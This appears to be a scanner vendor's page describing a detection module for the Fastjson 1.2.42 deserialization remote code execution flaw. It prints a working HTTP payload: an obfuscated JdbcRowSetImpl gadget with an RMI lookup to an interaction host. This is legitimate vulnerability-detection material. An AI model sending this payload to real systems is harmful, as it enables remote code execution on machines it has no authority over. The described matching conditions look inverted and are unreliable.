Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
The "Fastjson 1.2.42 - Remote Code Execution" module is designed to detect a vulnerability in the Fastjson 1.2.42 software. Fastjson is a Java library for parsing and generating JSON data. This module specifically targets a deserialization remote code execution vulnerability in Fastjson 1.2.42.
This vulnerability is classified as critical and has a CVSS score of 10, indicating its severity. It allows an attacker to execute arbitrary code remotely, potentially leading to unauthorized access, data breaches, or system compromise.
This module was authored by zh.
The impact of the "Fastjson 1.2.42 - Remote Code Execution" vulnerability can be severe. By exploiting this vulnerability, an attacker can execute arbitrary code on the target system. This can lead to various consequences, including unauthorized access, data manipulation, and complete compromise of the affected system.
The "Fastjson 1.2.42 - Remote Code Execution" module works by sending a specific HTTP request to the target system. The request is designed to trigger the deserialization remote code execution vulnerability in Fastjson 1.2.42.
Here is an example of the HTTP request sent by the module:
POST / HTTP/1.1
Host: {%Hostname%}
Content-Type: application/json
{
"@type":"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;",
"dataSourceName":"rmi://{%InteractionURL%}/Exploit",
"autoCommit":true
}
The module also includes matching conditions to determine if the vulnerability is present. In this case, it checks for the absence of the "interactsh_protocol" word in the response and a non-200 status code. If these conditions are met, the module reports the vulnerability.
It is important to note that this module is specifically designed for vulnerability detection and not for exploitation. Its purpose is to identify systems that are vulnerable to the Fastjson 1.2.42 deserialization remote code execution vulnerability.
For more information, you can refer to the GitHub repository related to this vulnerability.